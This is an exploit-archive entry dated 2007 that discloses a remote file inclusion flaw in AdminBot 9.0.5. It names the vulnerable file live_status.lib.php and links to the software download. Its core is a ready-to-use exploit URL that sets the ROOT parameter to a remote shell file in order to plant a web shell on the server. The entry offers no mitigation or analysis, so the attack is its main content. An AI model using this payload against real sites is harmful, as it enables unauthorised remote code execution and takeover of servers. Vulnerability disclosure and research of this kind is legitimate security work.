id: 1921
date: 05/28/2007
title: AdminBot 9.0.5 (live_status.lib.php ROOT) RFI Vulnerability
author: ThE TiGeR
cves: 

===========================================================
AdminBot 9.0.5 (live_status.lib.php ROOT) RFI Vulnerability
===========================================================


#AdminBot-MX Remote file inclusion

#Download script : http://download.nexen.org/tools/adminbot/adminbot_http-mxb2.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://127.0.0.1/[adminbot_path]/lib/live_status.lib.php?ROOT=shell.txt?

#Discovered by ThE TiGeR



#  0day.today [2023-03-25]  #